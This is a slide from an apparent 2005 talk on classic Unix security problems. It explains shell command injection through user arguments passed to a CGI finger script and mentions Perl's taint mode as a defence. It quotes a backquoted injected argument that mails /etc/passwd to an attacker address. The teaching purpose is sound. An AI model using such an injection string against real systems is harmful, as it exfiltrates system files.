| Next | Classic Unix Security Problems | 29 |
$FINGER $*
$* is the script's command-line arguments
Arguments are supplied by the user
What if the arguments are:
`Mail badguy@treachery.com < /etc/passwd`
Note backquotes
If httpd is running is root, even worse can occur
In 1994, this was very shocking
Perl's taint feature was put in to help deal with this sort of thing
| Next | |
Copyright © 2005 M. J. Dominus |